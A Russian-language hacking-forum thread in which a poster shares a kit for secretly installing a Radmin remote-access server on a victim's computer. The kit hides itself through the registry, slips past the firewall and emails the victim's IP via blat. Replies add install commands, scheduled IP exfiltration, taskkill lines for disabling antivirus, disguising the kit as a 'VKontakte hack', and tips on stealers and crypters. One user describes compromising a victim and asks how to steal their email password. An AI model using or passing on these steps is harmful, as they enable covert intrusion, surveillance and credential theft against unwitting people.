PDA

Просмотр полной версии : Скрытый радмин + скрытая установка + ip на почту


qazer
20.12.2008, 18:18
Сборка от меня для тех кому лень перечитывать сотни страниц фака по этой теме.

Все файлы надо добавить в SFX архив и в свойствах указать выполнить после распаковки install.bat

далее при запуски архива...вы не увидите ничего)Это работа утилиты CMDow которая запускает cmd в скрытом режиме.

что же происходит в данный момент?

архив распаковывает файлы файлы для радмина копирует в windows, файлы почтовой утилиты в windows\system32\ , добавляет записи в реестре чтобы радминсервер не было видно,чтоб не ругался виндфаерволл, запускает радминсервер , и отдаёт команду на отсылку ip на ваш почтовый адрес.

после того,как программа выполнится,все распакованные файлы удаляются.

Как пользоваться?

В файле install.bat надо прописать адрес логин и пароль вашей почты,а так же строку с паролем от радмина (по умолчанию пароля нет).далее создаём самораспаковывающийся архив, и кидаем его жертве.

Чтобы не было так паливно,можно прописать в install.bat удаление самого архива и запуск какой-нибудь проги,установщик которой вы добавите в архив,например "Взлом_Вконтакте.exe"

Дописывайте,корректируйте под свои нужды,я лишь выкладываю основу,далее всё зависит от вашей фантазии

P.S. готовый sfx архив не возможно передать по почте,говорит найден вирус)как это обойти,каждый додумывается сам.


http://www.filehoster.ru/files/bx3443

никаких вирусов там нет,архив обычный

k0lbasa
05.01.2009, 01:32
отличная штука

cremator (c)
05.01.2009, 01:47
Кто тестил?

ex3me
07.01.2009, 17:49
использование батников палится антивирусниками... имхо - этот способ устарел с тех пор, как ушла из жизни винда 95/98, поэтому см пост http://forum.antichat.ru/showpost.php?p=1041809&postcount=227

SmaTR
07.01.2009, 19:01
незнаю,всё проверил,каспер непалит,только вот ип на почту неприходит)) а тк у нас тут у всех ип динамический,приходится каждый раз просить прислать картинку в аське))))) есть какойнить способ узнать ип удаленно?

stopxaker
07.01.2009, 19:13
незнаю,всё проверил,каспер непалит,только вот ип на почту неприходит)) а тк у нас тут у всех ип динамический,приходится каждый раз просить прислать картинку в аське))))) есть какойнить способ узнать ип удаленно?

есть способ , я делаю так : радмин (моя сборка) +pinch, этот радмин перебивает уже установленный радмин на мой пароль и не виден в трее , что очень удобно .

2 qazer способ устарел , протестил на 6 компах везде палево , опять же говорю радмин (моя сборка) +pinch+криптор+джойнер и будет всё very good ;)

2 qazer а то что писал +

ex3me
08.01.2009, 18:36
У меня сейчас заказ: создать сборку, в которой отправка IP жертвы будет производиться на номер ICQ. Выложу позже на Плати.ру - кто захочет, тот приобритет.
Спросите почему платно? Отвечу: после изменений в протоколе icq (ведь все обновляли квип до 8080? кто обновлял - поймет меня) довольно трудно написать что-то работающее, чтобы оно отправляло что-то куда-то (я использую делфи 7й версии)

B1t.exe
08.01.2009, 19:18
так не понял, как отправляет на почту IP ? SMTP (25 Порт?)? а если стоит файрвол и у клиента нет аутлук ? (например у меня не стоит никакого почтового клиента).

qazer
08.01.2009, 19:42
там в сборке консольный почтовый клиент есть,который всё и отправляет юкстати там в настройках указан альтернативный порт (можно переделать на 25ый)

stopxaker
08.01.2009, 20:28
У меня сейчас заказ: создать сборку, в которой отправка IP жертвы будет производиться на номер ICQ. Выложу позже на Плати.ру - кто захочет, тот приобритет.
Спросите почему платно? Отвечу: после изменений в протоколе icq (ведь все обновляли квип до 8080? кто обновлял - поймет меня) довольно трудно написать что-то работающее, чтобы оно отправляло что-то куда-то (я использую делфи 7й версии)


Я приобрету без разговора , давно уже юзаю твои сборки , доволен :)

оффтоп 2 ex3me стукнул в аську ;)

DREASTY
08.01.2009, 20:46
молодчага!!давно таким занималсь!все еще актуально!

stratocaster
18.01.2009, 01:02
Кто нить тестил? А то я нуб и оажется что это вдруг еще не работает, а если это работает - буду рабираться, отзовитесь кто тестил

Tigger
18.01.2009, 02:49
Вы, конечно, прости, но я не нашел, где в настройках Архива определлый файл выполнить =\

qazer
18.01.2009, 21:32
делаешь sfx архив там на вкладке дополнительно есть строчка после распаковки выполнить и пишешь туда имя файла

Shadow6120
21.01.2009, 23:28
А ни у кого нет подобной сборки только где радмин 3.*? А то висту срочно ломануть надо :)

cracker
24.01.2009, 01:02
В файле install.bat надо прописать адрес логин и пароль вашей почты,а так же строку с паролем от радмина (по умолчанию пароля нет).далее создаём самораспаковывающийся архив, и кидаем его жертве. в какой именно строки надо прописать пароли от радмина?и как?

Kharek
01.02.2009, 17:08
Я добавил пароль к радмину такой командой:
"%SYSTEMROOT%/svchost.exe" /save /silence /pass:тут_пишешь_пароль /port:тут_пишешь_порт
Пишешь эту команду сразу после строчки
"%SYSTEMROOT%/help/Tours/mmTour/svchost.exe" /install /silence
Но почта не работает. Может быть это связано с тем, что я юзаю gmail.com, а у них защищенное TSL соеденение?

pirbul
06.02.2009, 19:25
жалко что она одноразовая.....

Scripter
06.02.2009, 22:08
в какой именно строки надо прописать пароли от радмина?и как?
либо в реестре

Hackser68
06.02.2009, 22:20
люди чёто я не вьехал обьясните дурачку как настроить?

stopxaker
07.02.2009, 06:13
люди чёто я не вьехал обьясните дурачку как настроить?


Для дурачков , вот человек написал готовый скрытый радмин всё в одном флаконе !

http://forum.antichat.ru/threadnav101461-1-10.html

Slev7n
05.03.2009, 16:35
если тема ешо актуална для тех которие не разобрались с отсиланиам почты

в етои строке убираити вконтсе точку blat.exe %systemroot%/system32/ip.txt -to вашапочта@yandex.ru.

+ делаити фаил ip.bat с вашаи сторчкой ( с вашаи почтаи на которую будит отсилат ) прописиваити ево в install.bat
copy /y "ip.bat" "%SYSTEMROOT%/system32/ip.bat"

тогда вам на почту каждие 15 минут будит приходит ip

Svist2008
06.04.2009, 19:08
Чтобы не было так паливно,можно прописать в install.bat удаление самого архива и запуск какой-нибудь проги,установщик которой вы добавите в архив,например "Взлом_Вконтакте.exe"

Подскажите плиз, что прописать в батнике, чтобы удалился сам SFX архив.
Спасибо.

MRAK9
06.04.2009, 19:30
Чтобы не было так паливно,можно прописать в install.bat удаление самого архива и запуск какой-нибудь проги,установщик которой вы добавите в архив,например "Взлом_Вконтакте.exe"

Подскажите плиз, что прописать в батнике, чтобы удалился сам SFX архив.
Спасибо.

а в самом SFX прописать никак что ли

Svist2008
06.04.2009, 19:36
а в самом SFX прописать никак что ли
____________________________________________
А разве там есть такая функция?

Svist2008
07.04.2009, 11:15
Народ, так кто нибудь подскажет, что прописать в батнике, что бы после распаковки SFX архива этот же архив удалился?

Zitt
07.04.2009, 11:42
А разве там есть такая функция?
есть ..

Svist2008
07.04.2009, 11:50
есть ..


Ты оказывается ещё хуже меня с компом знаком!
Там такой функции нет и быт не может!!!!!!!!!!!!!

Zitt
07.04.2009, 11:55
напиши команду после распоковки или в батнике "del sfx.exe" (без кавычек)

Svist2008
07.04.2009, 13:18
напиши команду после распоковки или в батнике "del sfx.exe" (без кавычек)

Нет, не получается, не удаляетя такой командой при распаковки архив SFX :mad:

Reptiliy
15.04.2009, 00:34
Ребят не подскажите как мне узнать пароль от его мыла ? Короче закинул я жертве скрытый Radmin приконектился хотел закинуть трояна через радмин но начал закидывать там антивирус закричал как мне через телнет его выключить ? у него стоит антивирус Sumantec AntiVirus

blood150
15.04.2009, 07:08
Ребят не подскажите как мне узнать пароль от его мыла ? Короче закинул я жертве скрытый Radmin приконектился хотел закинуть трояна через радмин но начал закидывать там антивирус закричал как мне через телнет его выключить ? у него стоит антивирус Sumantec AntiVirus
узнай под каким именем Sumantec AntiVirus в диспетчере задач в процессах отоброжается и сделай так:
taskkill /f /im название_процесса.exe
я закрывал нод 32 так: taskkill /f /im egui.exe

Reptiliy
15.04.2009, 10:09
blood150 а как узнать в диспечере задач как он отображаеца

speckn
21.05.2009, 14:15
drweb 5.0 видит в этом архиве RA и еще что-то не помню

zeonx
22.05.2009, 19:14
Ребят не подскажите как мне узнать пароль от его мыла ? Короче закинул я жертве скрытый Radmin приконектился хотел закинуть трояна через радмин но начал закидывать там антивирус закричал как мне через телнет его выключить ? у него стоит антивирус Sumantec AntiVirus
Нелегче ли тебе скачать файлы с паролями и у себя их расшифровать. Антивирусы просто так не вырубишь.

wisspy
07.08.2009, 17:15
Подскажите пожалуйста ньюбу, чем запаковать это всё великолепие в .exe файл...
Много гуглил... как то туго для меня это даётся...
Пробовал nBinder Limited но он что-то не хочет работать у меня : \

vilfenix
10.08.2009, 20:42
дайте батник плиз, который отсылает ip жертвы на мыло, желательно с таймерои, чтобы каждые пять минут присылал
очень нужно

zeonx
13.08.2009, 11:03
Подскажите пожалуйста ньюбу, чем запаковать это всё великолепие в .exe файл...
Много гуглил... как то туго для меня это даётся...
Пробовал nBinder Limited но он что-то не хочет работать у меня : \

Quick Batch Compiler тебе поможет

Drag_on
09.09.2009, 15:24
Гуд сам так баловался)

hackmon
07.10.2009, 17:20
где прописывать пасс? на радмин

nitr00
14.10.2009, 09:11
не полящийся говоришь???
в процессах он числиться так же как и в строке где все программы/время

sakrej1
23.11.2009, 12:54
Штука хорошая, тока у иеня по началу батник палился антивиром. НО с этим я разобрался. А как сделать что бы это все чудо запускалось каждый раз при старте компа? Что бы айпи на мыло отсылал постоянно? :confused:

cheater_man
29.11.2009, 21:06
Штука хорошая, тока у иеня по началу батник палился антивиром. НО с этим я разобрался. А как сделать что бы это все чудо запускалось каждый раз при старте компа? Что бы айпи на мыло отсылал постоянно? :confused:
ip на мыло говоришь :) Ну обычно делают так что через заданный промежуток времени ip-шник шлется на ftp серв. Это проще легче реализовать. Можно вообще батничек написать! Блин это все дело мозга и прямых рук, так что сам вкдючай свой мозг :)

bassoto
07.05.2010, 15:40
Надод, может кто обяснить или сделать что бы она в автозагрузку прописывалась?

cleric.80
22.05.2010, 15:53
Надод, может кто обяснить или сделать что бы она в автозагрузку прописывалась?

а что в ручную ? в папку автозагрузки никак не закинуть ?
только тот файл что открывает дверь, без ip sendera )) ато заипешься почту вычищать..)) наскок помню работало,

Migel
09.06.2010, 10:54
Кто нибудь перезалейте сабж пожалуйста...